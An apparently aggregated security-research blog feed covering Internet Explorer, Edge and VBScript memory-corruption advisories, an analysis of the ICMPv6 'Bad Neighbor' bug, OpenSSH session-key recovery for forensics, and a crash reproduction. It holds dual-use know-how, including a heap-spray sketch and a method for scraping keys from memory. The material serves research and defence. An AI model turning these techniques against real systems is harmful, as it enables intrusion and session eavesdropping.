
MSIE 11 garbage collector attribute type confusion

5 April 2023 at 19:10

(MS16-063, CVE-2016-0199)

With MS16-063 Microsoft has patched CVE-2016-0199: a memory corruption bug in the garbage collector of the JavaScript engine used in Internet Explorer 11. By exploiting this vulnerability, a website can cause this garbage collector to handle some data in memory as if it were an object, when in fact it contains data for another type of value, such as a string or number. The garbage collector code will use this data as a virtual function table (vftable) in order to make a virtual function call. An attacker has enough control over this data to allow execution of arbitrary code.
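A minimal sketch of why that is dangerous (this illustrates the general pattern; it is not the actual JScript9 code):

/* Sketch of the general pattern, NOT the actual JScript9 code: if a garbage
 * collector treats attacker-controlled data as an object, the first
 * pointer-sized field is used as a vftable pointer for an indirect call. */
struct object {
    void (**vftable)(struct object *self);  /* table of virtual function pointers */
};

void gc_visit(struct object *o) {
    /* If `o` actually points at string or number data, the attacker controls
     * `vftable` and therefore the target of this indirect call. */
    o->vftable[0](o);
}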

MS Edge Tree::ANode::IsInTree use-after-free (MemGC) & Abandonment

5 April 2023 at 19:10

A specially crafted Javascript inside an HTML page can trigger a use-after-free bug in Tree::ANode::IsInTree or a breakpoint in Abandonment::InduceAbandonment in Microsoft Edge. The use-after-free bug is mitigated by MemGC: if MemGC is enabled (which it is by default) the memory is never freed. This effectively prevents exploitation of the issue. The Abandonment appears to be triggered by a stack exhaustion bug; the Javascript creates a loop where an event handler triggers a new event, which in turn triggers the event handler, etc. This consumes stack space until there is no more stack available. Edge does appear to be able to handle such a situation gracefully under certain conditions, but not all. It is easy to avoid those conditions and force triggering the Abandonment.

The interesting thing is that this indicates that the assumption "hitting Abandonment means a bug is not a security issue" may not be correct in all cases.

MS Edge CDOMTextNode::get_data type confusion

5 April 2023 at 19:10

(MS16-002, CVE-2016-0003)

Specially crafted Javascript inside an HTML page can trigger a type confusion bug in Microsoft Edge that allows accessing a C++ object as if it was a BSTR string. This can result in information disclosure, such as allowing an attacker to determine the value of pointers to other objects and/or functions. This information can be used to bypass ASLR mitigations. It may also be possible to modify arbitrary memory and achieve remote code execution, but this was not investigated.

MSIE 9-11 MSHTML PROPERTYDESC::HandleStyleComponentProperty out-of-bounds read

5 April 2023 at 19:10

(MS16-104, CVE-2016-3324)

A specially crafted web-page can cause Microsoft Internet Explorer 9-11 to assume a CSS value stored as a string can only be "true" or "false". To determine which of these two values it is, the code checks whether the fifth character is an 'e' or a '\0'. An attacker that is able to set the value to a shorter string can cause the code to read data out-of-bounds, and is able to determine whether a WCHAR value stored behind that string is '\0' or not.
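A hypothetical reconstruction of the flawed check (the actual MSHTML code is not public; this merely illustrates the logic described above):

#include <windows.h>

/* Hypothetical reconstruction, NOT the actual MSHTML code. For the only two
 * expected values, the fifth character is enough to tell them apart:
 *   L"true\0" -> value[4] == L'\0'
 *   L"false"  -> value[4] == L'e'
 * If an attacker stores a shorter string, value[4] reads past the end of the
 * allocation and leaks whether the WCHAR behind it is L'\0' or not. */
BOOL IsStyleComponentTrue(const WCHAR *value) {
    return value[4] == L'\0';  /* out-of-bounds read for strings shorter than "true" */
}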

MS Edge CTreePosGap::PartitionPointers use-after-free (MemGC)

5 April 2023 at 19:10

A specially crafted Javascript inside an HTML page can trigger a use-after-free bug in the CTreePosGap::PartitionPointers function of edgehtml.dll in Microsoft Edge. This use-after-free bug is mitigated by MemGC by default: with MemGC enabled the memory is never actually freed. This mitigation is considered sufficient to make this a non-security issue as explained by Microsoft SWIAT in their blog post Triaging the exploitability of IE/Edge crashes.

Since this is not considered a security issue, I have the opportunity to share the details with you before the issue has been fixed. And since Microsoft is unlikely to provide a fix for this issue on short notice, you should be able to reproduce this issue for some time after publication of this post. I will try to explain how I analyzed this issue using BugId and EdgeDbg, so that you can reproduce what I did and see for yourself.

VBScript RegExpComp::PnodeParse out-of-bounds read

5 April 2023 at 19:10

(The fix and CVE number for this bug are not known)

A specially crafted script can cause the VBScript engine to read data beyond a memory block for use as a regular expression. An attacker that is able to run such a script in any application that embeds the VBScript engine may be able to disclose information stored after this memory block. This includes all versions of Microsoft Internet Explorer.

Magic values in 32-bit processes and 64-bit OS-es

12 November 2020 at 12:00

Software components such as memory managers often use magic values to mark memory as having a certain state. These magic values have often (but not always) been chosen to coincide with addresses that fall outside of the user-land address space on 32-bit versions of the Operating System. This ensures that if a vulnerability in the software allows an attacker to get the code to use such a value as a pointer, this results in an access violation. However, on 64-bit architectures the entire 32-bit address space can be used for user-land allocations, allowing an attacker to allocate memory at all the addresses commonly used as magic values and exploit such a vulnerability.
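Some well-known examples of such values on Windows (an illustrative, not exhaustive, list):

/* Well-known Windows debug fill values (illustrative, not exhaustive). On a
 * 32-bit OS, user-land typically ends at 0x7FFFFFFF, so dereferencing any of
 * these faults immediately: */
#define HEAP_ALLOC_FILL 0xBAADF00D  /* debug heap: fresh, uninitialized allocation */
#define HEAP_FREE_FILL  0xFEEEFEEE  /* debug heap: freed memory                    */
#define CRT_ALLOC_FILL  0xCDCDCDCD  /* MSVC debug CRT: uninitialized heap memory   */
#define CRT_FREE_FILL   0xDDDDDDDD  /* MSVC debug CRT: freed heap memory           */
/* In a 32-bit process on a 64-bit OS, however, all of these addresses can be
 * mapped by an attacker, so using one as a pointer no longer guarantees an
 * access violation. */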

Heap spraying high addresses in 32-bit Chrome/Firefox on 64-bit Windows

12 November 2020 at 12:00

In my previous blog post I wrote about "magic values" that were originally chosen to help mitigate exploitation of memory corruption flaws and how this mitigation could potentially be bypassed on 64-bit Operating Systems, specifically Windows. In this blog post, I will explain how to create a heap spray (of sorts) that can be used to allocate memory in the relevant address space range and fill it with arbitrary data for use in exploiting such a vulnerability.
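To give a taste of the idea: in a 32-bit large-address-aware process on 64-bit Windows, the upper 2 GiB of address space is valid user-land, so memory can simply be mapped at the address a magic value points to. A minimal native sketch (the post itself covers achieving this from JavaScript):

#include <windows.h>
#include <stdio.h>

int main(void) {
    /* Round the magic value down to the 64 KiB allocation granularity and map
     * memory there. This only works in a /LARGEADDRESSAWARE 32-bit process on
     * a 64-bit OS, where addresses above 2 GiB are available to user-land. */
    void *base = VirtualAlloc((void *)(0xBAADF00D & ~0xFFFFu), 0x10000,
                              MEM_RESERVE | MEM_COMMIT, PAGE_READWRITE);
    if (base != NULL)
        *(DWORD *)0xBAADF00D = 0x41414141;  /* the "magic" address is now writable */
    printf("mapped at %p\n", base);
    return 0;
}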

MSIE 11 MSHTML CView::CalculateImageImmunity use-after-free

5 April 2023 at 19:10

(The fix and CVE number for this bug are not known)

A specially crafted web-page can cause Microsoft Internet Explorer 11 to free a memory block that contains information about an image. The code continues to use the data in the freed memory block immediately after freeing it. There does not appear to be enough time between the free and the reuse to exploit this issue.

MSIE 9 MSHTML CPtsTextParaclient::CountApes out-of-bounds read

5 April 2023 at 19:10

(The fix and CVE number for this bug are not known)

A specially crafted web-page can cause Microsoft Internet Explorer 9 to access data before the start of a memory block. An attacker that is able to control what is stored before this memory block may be able to disclose information from memory or execute arbitrary code.

MSIE 10&11 BuildAnimation NULL pointer dereference

12 November 2020 at 12:00

A specially crafted style sheet inside an HTML page can trigger a NULL pointer dereference in Microsoft Internet Explorer 10 and 11. The pointer in question is assumed to point to a function, and the code attempts to use it to execute this function, which normally leads to an access violation when attempting to execute unmapped memory at address 0. In some cases, Control Flow Guard (CFG) will attempt to check if the address is a valid indirect call target. Because of the way CFG is implemented, this can lead to a read access violation in unmapped memory at a seemingly arbitrary address.

VBScript CRegExp::Execute use of uninitialized memory

5 April 2023 at 19:10

(MS14-080 and MS14-084, CVE-2014-6363)

A specially crafted script can cause the VBScript engine to access data before initializing it. An attacker that is able to run such a script in any application that embeds the VBScript engine may be able to control execution flow and execute arbitrary code. This includes all versions of Microsoft Internet Explorer.

Exploring the Exploitability of “Bad Neighbor”: The Recent ICMPv6 Vulnerability (CVE-2020-16898)

11 November 2020 at 19:59

At the Patch Tuesday on October 13, Microsoft published a patch and an advisory for CVE-2020-16898, dubbed “Bad Neighbor”, which was undoubtedly the highlight of the monthly series of patches. The bug has received a lot of attention since it was published as an RCE vulnerability, meaning that a successful exploit could be made wormable. Initially, it was graded with a high CVSS score of 9.8/10, though it was later lowered to 8.8.

In the days following the publication, several write-ups and POCs were published. We looked at some of them.

The writeup by pi3 contains details that are not mentioned in the writeup by Quarkslab. It’s important to note that the bug can only be exploited when the source address is a link-local address. That’s a significant limitation, meaning that the bug cannot be exploited over the internet. In any case, both writeups explain the bug in general and then dive into triggering a buffer overflow, causing a system crash, without exploring other options.

We wanted to find out whether something else could be done with this vulnerability, aside from triggering the buffer overflow and causing a blue screen (BSOD).

In this writeup, we’ll share our findings.

The bug in a nutshell

The bug happens in the tcpip!Ipv6pHandleRouterAdvertisement function, which is responsible for handling incoming ICMPv6 packets of the type Router Advertisement (part of the Neighbor Discovery Protocol).

The packet structure is (RFC 4861):

 0                   1                   2                   3
 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
|     Type      |     Code      |          Checksum             |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| Cur Hop Limit |M|O|  Reserved |       Router Lifetime         |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
|                         Reachable Time                        |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
|                          Retrans Timer                        |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
|   Options ...
+-+-+-+-+-+-+-+-+-+-+-+-

As can be seen from the packet structure, the packet consists of a 16-byte header, followed by a variable number of option structures. Each option structure begins with a type field and a length field, followed by fields specific to the relevant option type.

The bug happens due to incorrect handling of the Recursive DNS Server Option (type 25, RFC 5006):

 0                   1                   2                   3
 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
|     Type      |     Length    |           Reserved            |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
|                           Lifetime                            |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
|                                                               |
:            Addresses of IPv6 Recursive DNS Servers            :
|                                                               |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+

The Length field defines the length of the option in units of 8 bytes. The option header is 8 bytes, and each IPv6 address adds an additional 16 bytes, so an option containing n IPv6 addresses is supposed to have its length set to 1+2*n, which is always odd. The bug happens when the length is an even number, causing the code to misplace the beginning of the next option structure.
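In other words (an illustrative calculation, not the actual tcpip.sys code):

/* Illustrative calculation, not the actual tcpip.sys code: both loops read
 * the same Length field, but advance through the packet differently. */
void rdnss_length_mismatch(void)
{
    unsigned length      = 4;                  /* even Length, as in the POC        */
    unsigned option_size = length * 8;         /* first loop skips 32 bytes         */
    unsigned num_addrs   = (length - 1) / 2;   /* integer division: (4 - 1) / 2 = 1 */
    unsigned parsed_size = 8 + num_addrs * 16; /* second loop consumes only 24 bytes */
    /* parsed_size < option_size: the second loop resumes 8 bytes early, in the
     * middle of the option, and treats unvalidated bytes as an option header. */
}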

Visualizing the POC of 0xeb-bp

As a starting point, let’s visualize 0xeb-bp’s POC and get some intuition about what’s going on and why it causes a stack overflow. Here is the ICMPv6 packet as constructed in the source code:

As you can see, the ICMPv6 packet is followed by two Recursive DNS Server options (type 25), and then a 256-byte buffer. The two options have an even length of 4, which triggers the bug.

The tcpip!Ipv6pHandleRouterAdvertisement function that parses the packet does two iterations over the option structures. The first iteration does simple checks such as verifying the length field of the structures. The second iteration actually parses the option structures. Because of the bug, each iteration interprets the packet differently.

Here’s how the first iteration sees the packet:

Each option structure is just skipped according to the length field after doing some basic checks.

Here’s how the second iteration sees it:

This time, in the case of a Recursive DNS Server option, the length field is used to determine the number of IPv6 addresses, which is calculated as follows:

amount_of_addr = (length - 1) / 2

Then, the IPv6 addresses are processed, and the next iteration continues after the last processed IPv6 address, which, for an even length value, lies in the middle of the option structure as the first iteration saw it. This results in processing an option structure which wasn’t validated in the first iteration.

Specifically in this POC, 34 is not a valid length for an option of type 24, but because it wasn’t validated, the processing continues and too many bytes are copied onto the stack, causing a stack overflow. Notably, fragmentation is required for triggering the stack overflow (see the Quarkslab writeup for details).

Zooming out

Now we know how to trigger a stack overflow using CVE-2020-16898, but what are the checks that are made in each of the mentioned iterations? What other checks, aside from the length check, can we bypass using this bug? Which option types are supported, and is the handling different for each of them? 

We didn’t find answers to these questions in any writeup, so we checked it ourselves.

Here are the relevant parts of the Ipv6pHandleRouterAdvertisement function, slightly simplified:

void Ipv6pHandleRouterAdvertisement(...)
{
    // Initialization and other code...

    if (!IsLinkLocalAddress(SrcAddress) && !IsLoopbackAddress(SrcAddress))
        // error

    // Initialization and other code...

    NET_BUFFER NetBuffer = /* ... */;

    // First loop
    while (NetBuffer->DataLength >= 2)
    {
        BYTE TempTypeLen[2];
        BYTE* TempTypeLenPtr = NdisGetDataBuffer(NetBuffer, 2, TempTypeLen, 1, 0);
        WORD OptionLenInBytes = TempTypeLenPtr[1] * 8;
        if (OptionLenInBytes == 0 || OptionLenInBytes > NetBuffer->DataLength)
            // error

        BYTE OptionType = TempTypeLenPtr[0];
        switch (OptionType)
        {
        case 1: // Source Link-layer Address
            // ...
            break;

        case 3: // Prefix Information
            if (OptionLenInBytes != 0x20)
                // error

            BYTE TempPrefixInfo[0x20];
            BYTE* TempPrefixInfoPtr = NdisGetDataBuffer(NetBuffer, 0x20, TempPrefixInfo, 1, 0);
            BYTE PrefixInfoPrefixLength = TempPrefixInfoPtr[2];
            if (PrefixInfoPrefixLength > 128)
                // error
            break;

        case 5: // MTU
            // ...
            break;

        case 24: // Route Information Option
            if (OptionLenInBytes > 0x18)
                // error

            BYTE TempRouteInfo[0x18];
            BYTE* TempRouteInfoPtr = NdisGetDataBuffer(NetBuffer, 0x18, TempRouteInfo, 1, 0);
            BYTE RouteInfoPrefixLength = TempRouteInfoPtr[2];
            if (RouteInfoPrefixLength > 128 ||
                (RouteInfoPrefixLength > 64 && OptionLenInBytes < 0x18) ||
                (RouteInfoPrefixLength > 0 && OptionLenInBytes < 0x10))
                // error
            break;

        case 25: // Recursive DNS Server Option
            if (OptionLenInBytes < 0x18)
                // error

            // Added after the patch - this is the fix
            //if ((OptionLenInBytes - 8) % 16 != 0)
            //    // error
            break;

        case 31: // DNS Search List Option
            if (OptionLenInBytes < 0x10)
                // error
            break;
        }

        NetBuffer->DataOffset += OptionLenInBytes;
        NetBuffer->DataLength -= OptionLenInBytes;
        // Other adjustments for NetBuffer...
    }

    // Rewind NetBuffer and do other stuff...

    // Second loop...
    while (NetBuffer->DataLength >= 2)
    {
        BYTE TempTypeLen[2];
        BYTE* TempTypeLenPtr = NdisGetDataBuffer(NetBuffer, 2, TempTypeLen, 1, 0);
        WORD OptionLenInBytes = TempTypeLenPtr[1] * 8;
        if (OptionLenInBytes == 0 || OptionLenInBytes > NetBuffer->DataLength)
            // error

        BOOL AdvanceBuffer = TRUE;

        BYTE OptionType = TempTypeLenPtr[0];
        switch (OptionType)
        {
        case 3: // Prefix Information
            BYTE TempPrefixInfo[0x20];
            BYTE* TempPrefixInfoPtr = NdisGetDataBuffer(NetBuffer, 0x20, TempPrefixInfo, 1, 0);
            BYTE PrefixInfoPrefixLength = TempPrefixInfoPtr[2];
            // Lots of code. Assumptions:
            // PrefixInfoPrefixLength <= 128
            break;

        case 24: // Route Information Option
            BYTE TempRouteInfo[0x18];
            BYTE* TempRouteInfoPtr = NdisGetDataBuffer(NetBuffer, 0x18, TempRouteInfo, 1, 0);
            BYTE RouteInfoPrefixLength = TempRouteInfoPtr[2];
            // Some code. Assumptions:
            // RouteInfoPrefixLength <= 128
            // Other, less interesting assumptions about RouteInfoPrefixLength
            break;

        case 25: // Recursive DNS Server Option
            Ipv6pUpdateRDNSS(..., NetBuffer, ...);
            AdvanceBuffer = FALSE;
            break;

        case 31: // DNS Search List Option
            Ipv6pUpdateDNSSL(..., NetBuffer, ...);
            AdvanceBuffer = FALSE;
            break;
        }

        if (AdvanceBuffer)
        {
            NetBuffer->DataOffset += OptionLenInBytes;
            NetBuffer->DataLength -= OptionLenInBytes;
            // Other adjustments for NetBuffer...
        }
    }

    // More code...
}

As can be seen from the code, only 6 option types are supported in the first loop; the others are ignored. In any case, each header is skipped precisely according to the Length field.

Even fewer options, 4, are supported in the second loop. And similarly to the first loop, each header is skipped precisely according to the Length field, but this time with two exceptions: types 24 (the Route Information Option) and 25 (the Recursive DNS Server Option) have functions which adjust the network buffer pointers by themselves, creating an opportunity for inconsistencies.

That’s exactly what happens with this bug: the Ipv6pUpdateRDNSS function doesn’t adjust the network buffer pointers as expected when the length field is even.

Breaking assumptions

Essentially, this bug allows us to break assumptions made by the second loop that are supposed to be verified in the first loop. The only relevant option types are the 4 which appear in both loops; that’s also why we didn’t include the other 2 in the code of the first loop. One such assumption is the value of the length field, and that’s how the buffer overflow POC works, but let’s revisit them all and see what can be achieved.

  • Option type 3 – Prefix Information
    • The option structure size must be 0x20 bytes. Breaking this assumption is what allows us to trigger the stack overflow, by providing a larger option structure. We can also provide a smaller structure, but that doesn’t have much value in this case.
    • The Prefix Length field value must be at most 128. Breaking this assumption allows us to set the field to an invalid value in the range of 129-255. This can indeed be used to cause an out-of-bounds data write, but in all such cases that we could find, the out-of-bounds write happens on the stack in a location which is overwritten later anyway, so causing such out-of-bounds writes has no practical value.

      For example, one such out-of-bounds write happens in tcpip!Ipv6pMakeRouteKey, called by tcpip!IppValidateSetAllRouteParameters.
  • Option type 24 – Route Information Option
    • The option structure size must not be larger than 0x18 bytes. Same implications as for option type 3.
    • The Prefix Length field value must be at most 128. Same implications as for option type 3.
    • The Prefix Length field value must fit the structure option size. That isn’t really interesting since any value in the range 0-128 is handled correctly. The worst thing that could happen here is a small out-of-bounds read.
  • Option type 25 – Recursive DNS Server Option
    • The option structure size must not be smaller than 0x18 bytes. This isn’t interesting, since the size must be at least 8 bytes anyway (the length field is verified to be larger than zero in both loops), and any such structure is handled correctly, even though a size of 8 bytes is not valid according to the specification.
    • The option structure size must be in the form of 8+n*16 bytes. This check was added after fixing CVE-2020-16898.
  • Option type 31 – DNS Search List Option
    • The option structure size must not be smaller than 0x10 bytes. Same implications as for option type 25.

As you can see, there was a slight chance of doing something other than the demonstrated stack overflow by breaking the assumption of the valid prefix length value for option type 3 or 24. Even though it’s literally about smuggling a single bit, sometimes that’s enough. But it looks like this time we weren’t that lucky.

Revisiting the Stack Overflow

Before giving up, we took a closer look at the stack. The POCs that we’ve seen overwrite the stack such that the stack cookie (the __security_cookie value) is corrupted, causing a system crash before the function returns.

We checked whether overwriting anything on the stack could help achieve code execution before the function returns. That could be a local variable in the “Local variables (2)” space, or any variable in the previous frames that might be referenced inside the function. Unfortunately, we came to the conclusion that all the variables in the “Local variables (2)” space are output buffers that are modified before access, and no data from the previous frames is accessed.

Summary

We conclude with high confidence that CVE-2020-16898 is not exploitable without an additional vulnerability. It is possible that we have missed something; any insights or feedback are welcome. Even though we weren’t able to exploit the bug, we enjoyed the research, and we hope that you enjoyed this writeup as well.


Decrypting OpenSSH sessions for fun and profit

11 November 2020 at 10:24

Author: Jelle Vergeer

Introduction

A while ago we had a forensics case in which a Linux server was compromised and a modified OpenSSH binary was loaded into the memory of a webserver. The modified OpenSSH binary was used as a backdoor to the system by the attackers. The customer had pcaps and a hypervisor snapshot of the system at the moment it was compromised. We started wondering if it was possible to decrypt the SSH session and gain knowledge of it by recovering key material from the memory snapshot. In this blogpost I will cover the research I have done into OpenSSH and release some tools to dump OpenSSH session keys from memory and to decrypt and parse sessions in combination with pcaps. I have also submitted my research to the 2020 Volatility framework plugin contest.

SSH Protocol

Firstly, I started reading up on OpenSSH and its workings. Luckily, OpenSSH is open source, so we can easily download and read the implementation details. The RFCs, although a bit boring to read, were also a wealth of information. From a high-level overview, the SSH protocol looks like the following:

  1. SSH protocol + software version exchange
  2. Algorithm negotiation (KEX INIT)
    • Key exchange algorithms
    • Encryption algorithms
    • MAC algorithms
    • Compression algorithms
  3. Key Exchange
  4. User authentication
  5. Client requests a channel of type “session”
  6. Client requests a pseudo terminal
  7. Client interacts with session

Starting at the beginning, the client connects to the server and sends the protocol version and software version:
SSH-2.0-OpenSSH_8.3. The server responds with its own protocol and software version. After this initial exchange, all traffic is wrapped in SSH frames. An SSH frame consists primarily of a length, padding length, payload data, padding content, and a MAC of the frame. An example SSH frame:

Example SSH Frame parsed with dissect.cstruct

Before an encryption algorithm is negotiated and a session key is generated, the SSH frames are unencrypted, and even when a frame is encrypted, parts of it may remain unencrypted depending on the algorithm. For example, aes256-gcm will not encrypt the 4-byte length field in the frame, but chacha20-poly1305 will.
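For reference, the binary packet layout from RFC 4253 looks roughly like this (a C-style sketch; the dissect.cstruct definition shown above is equivalent):

#include <stdint.h>

/* SSH binary packet format (RFC 4253, section 6), sketched as a C layout.
 * Whether packet_length itself is encrypted depends on the negotiated cipher:
 * aes256-gcm leaves it in plaintext, chacha20-poly1305 does not. */
struct ssh_frame {
    uint32_t packet_length;   /* length of the remainder, excluding the MAC */
    uint8_t  padding_length;  /* number of trailing random padding bytes    */
    uint8_t  payload[];       /* packet_length - padding_length - 1 bytes   */
    /* uint8_t padding[padding_length];  -- random padding                  */
    /* uint8_t mac[mac_length];          -- MAC over sequence nr + frame    */
};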

Next up, the client sends a KEX_INIT message to the server to start negotiating parameters for the session, such as the key exchange and encryption algorithms. Depending on the order of those algorithms, the client and server pick the first preferred algorithm that is supported by both sides. Following the KEX_INIT message, several key exchange related messages are exchanged, after which a NEWKEYS message is sent from both sides. This message tells the other side that everything is set up to start encrypting the session and that the next frame in the stream will be encrypted. After both sides have taken the new encryption keys into effect, the client requests user authentication and, depending on the authentication mechanisms configured on the server, performs password-, key-, or otherwise-based authentication. After the session is authenticated, the client opens a channel and requests services over that channel based on the requested operation (ssh, sftp, scp, etc.).

Recovering the session keys

The first step in recovering the session keys was to analyze the OpenSSH source code and debug existing OpenSSH binaries. I tried compiling OpenSSH myself, logging the generated session keys somewhere, and then attaching a debugger and searching for those keys in the memory of the program. Success! Session keys were kept in memory on the heap. Some more digging into the source code pointed me to the functions responsible for sending and receiving the NEWKEYS frame. I discovered there is an “ssh” structure which stores a “session_state” structure. This structure in turn holds all kinds of information related to the current SSH session, including a newkeys structure containing information on the encryption, MAC and compression algorithms. One level deeper we finally find the “sshenc” structure, holding the name of the cipher, the key, the IV and the block length. Everything we need! A nice overview of the structures in OpenSSH is shown below:

SSHENC Structure and relations

And the definition of the sshenc structure:

SSHENC Structure
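Paraphrased from OpenSSH’s kex.h (the exact definition may differ slightly between versions):

/* Paraphrased from OpenSSH's kex.h; may differ slightly between versions. */
struct sshenc {
    char    *name;        /* cipher name, e.g. "aes256-gcm@openssh.com" */
    const struct sshcipher *cipher;
    int      enabled;
    u_int    key_len;
    u_int    iv_len;
    u_int    block_size;
    u_char  *key;         /* the session key we are after */
    u_char  *iv;
};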

It’s difficult to find the key itself in memory (it’s just a string of random bytes), but the sshenc (and other) structures are more distinct, having some properties we can validate against. We can then scrape the entire memory address space of the program and validate each offset against these constraints. We can check for the following properties:

  • name, cipher, key and iv members are valid pointers
  • The name member points to a valid cipher name, which is equal to cipher->name
  • key_len is within a valid range
  • iv_len is within a valid range
  • block_size is within a valid range
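A minimal sketch of that validation logic (the actual POC is a Python script using ptrace; the helper functions and value ranges here are illustrative assumptions):

/* Illustrative sketch: is_valid_pointer(), is_known_cipher_name() and
 * cipher_name() are hypothetical helpers, and the ranges are assumptions. */
static int looks_like_sshenc(const struct sshenc *e) {
    return is_valid_pointer(e->name) && is_valid_pointer(e->cipher) &&
           is_valid_pointer(e->key)  && is_valid_pointer(e->iv)     &&
           is_known_cipher_name(e->name)                            &&
           strcmp(e->name, cipher_name(e->cipher)) == 0             &&
           e->key_len    >= 16 && e->key_len    <= 64 &&  /* plausible key size   */
           e->iv_len     <= 16 &&                         /* plausible IV size    */
           e->block_size >= 8  && e->block_size <= 16;    /* plausible block size */
}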

If we validate against all these constraints, we should be able to reliably find the sshenc structure. I started off building a POC Python script which I could run on a live host, which attaches to processes and scrapes their memory for this structure. The source code for this script can be found here. It actually works rather well and outputs a JSON blob for each key found. So I demonstrated that I can recover the session keys from a live host with Python and ptrace, but how are we going to recover them from a memory snapshot? This is where Volatility comes into play. Volatility is a memory forensics framework written in Python with the ability to write custom plugins. With some effort, I was able to write a Volatility 2 plugin that could analyze the memory snapshot and dump the session keys! For the Volatility 3 plugin contest I also ported the plugin to Volatility 3 and submitted the plugin and research to the contest. Fingers crossed!

Volatility 2 SSH Session Key Dumper output

Decrypting and parsing the traffic

The recovery of the session keys used to encrypt and decrypt the traffic was successful. Next up: decrypting the traffic! I started parsing some pcaps with pynids, a TCP parsing and reassembly library. I used our in-house developed dissect.cstruct library to parse data structures, and developed a parsing framework to parse protocols like SSH. The parsing framework feeds the packets to the protocol parser in the correct order, so if the client sends 2 packets and the server replies with 3 packets, the packets are supplied to the parser in that same order. This is important to keep overall protocol state. The parser consumes SSH frames until a NEWKEYS frame is encountered, indicating that the next frame is encrypted. The parser then peeks at the next frame in the stream from that source and iterates over the supplied session keys, trying to decrypt the frame. If successful, the parser installs the session key in the state to decrypt the remaining frames in the session. The parser can handle pretty much all encryption algorithms supported by OpenSSH. The following animation tries to depict this process:

SSH Protocol Parsing
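In pseudocode, the key-trial step looks something like this (a sketch; the real parser is Python, and the helper names are illustrative):

/* Sketch of the key-trial step; try_decrypt_first_block() and
 * install_session_key() are illustrative helpers, not a real API. */
for (size_t i = 0; i < num_candidate_keys; i++) {
    struct frame_header hdr;
    if (!try_decrypt_first_block(frame, &keys[i], &hdr))
        continue;
    /* Sanity checks on the decoded header: a sane total length and at least
     * 4 bytes of padding (RFC 4253). A wrong key yields garbage that fails. */
    if (hdr.packet_length >= 12 && hdr.packet_length <= MAX_FRAME_LEN &&
        hdr.padding_length >= 4 && hdr.padding_length < hdr.packet_length) {
        install_session_key(stream, &keys[i]);  /* decrypts the rest of the session */
        break;
    }
}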

And finally the parser in action, where you can see it decrypt and parse an SSH session, also exposing the password used by the user to authenticate:

Example decrypted and parsed SSH session

Conclusion

So to sum up: I researched the SSH protocol and how session keys are stored and kept in memory by OpenSSH, found a way to scrape them from memory, and used them in a network parser to decrypt and parse SSH sessions into readable output. The scripts used in this research can be found here.

A potential next step, or nice-to-have, would be implementing this decrypter and parser in Wireshark.

Final thoughts

Funnily enough, during my research I also came across these commented-out lines in the ssh_set_newkeys function in the OpenSSH source. How ironic! If these lines were uncommented and compiled into the OpenSSH binaries, this research would have been much harder.

OpenSSH source code snippet


Re-discovering a JWT Authentication Bypass in ServiceStack

2 November 2020 at 08:37
TL;DR ServiceStack before version 5.9.2 failed to properly verify JWT signatures, allowing attackers to forge arbitrary tokens and bypass authentication/authorization mechanisms. The vulnerability was discovered and patched by the ServiceStack team without highlighting the actual impact, so we chose to publish this blog post along with an advisory. Routine checks -> Auth bypass: during a Web Application Penetration Test for one of our customers, I noticed that after the login process through a 3rd-party OAuth service, the web application used JWT tokens to track sessions and privileges.

Crash Reproduction Series: Microsoft Edge Legacy

2 November 2020 at 07:30
Crash Reproduction Series: Microsoft Edge Legacy

During yet another Digital Forensics investigation using ZecOps Crash Forensics Platform, we saw a crash of the Legacy (pre-Chromium) Edge browser. The crash was caused by a NULL pointer dereference bug, and we concluded that the root cause was a benign bug of the browser. Nevertheless, we thought that it would be a nice showcase of a crash reproduction.

Here’s the stack trace of the crash:

00007ffa`35f4a172     edgehtml!CMediaElement::IsSafeToUse+0x8
00007ffa`36c78124     edgehtml!TrackHelpers::GetStreamIndex+0x26
00007ffa`36c7121f     edgehtml!CSourceBuffer::RemoveAllTracksHelper<CTextTrack,CTextTrackList>+0x98
00007ffa`36880903     edgehtml!CMediaSourceExtension::Var_removeSourceBuffer+0xc3
00007ffa`364e5f95     edgehtml!CFastDOM::CMediaSource::Trampoline_removeSourceBuffer+0x43
00007ffa`3582ea87     edgehtml!CFastDOM::CMediaSource::Profiler_removeSourceBuffer+0x25
00007ffa`359d07b6     Chakra!Js::JavascriptExternalFunction::ExternalFunctionThunk+0x207
00007ffa`35834ab8     Chakra!amd64_CallFunction+0x86
00007ffa`35834d38     Chakra!Js::InterpreterStackFrame::OP_CallCommon<Js::OpLayoutDynamicProfile<Js::OpLayoutT_CallIWithICIndex<Js::LayoutSizePolicy<0> > > >+0x198
00007ffa`35834f99     Chakra!Js::InterpreterStackFrame::OP_ProfiledCallIWithICIndex<Js::OpLayoutT_CallIWithICIndex<Js::LayoutSizePolicy<0> > >+0xb8
00007ffa`3582cd80     Chakra!Js::InterpreterStackFrame::ProcessProfiled+0x149
00007ffa`3582df9f     Chakra!Js::InterpreterStackFrame::Process+0xe0
00007ffa`3582cf9e     Chakra!Js::InterpreterStackFrame::InterpreterHelper+0x88f
0000016a`bacc1f8a     Chakra!Js::InterpreterStackFrame::InterpreterThunk+0x4e
00007ffa`359d07b6     0x0000016a`bacc1f8a
00007ffa`358141ea     Chakra!amd64_CallFunction+0x86
00007ffa`35813f0c     Chakra!Js::JavascriptFunction::CallRootFunctionInternal+0x2aa
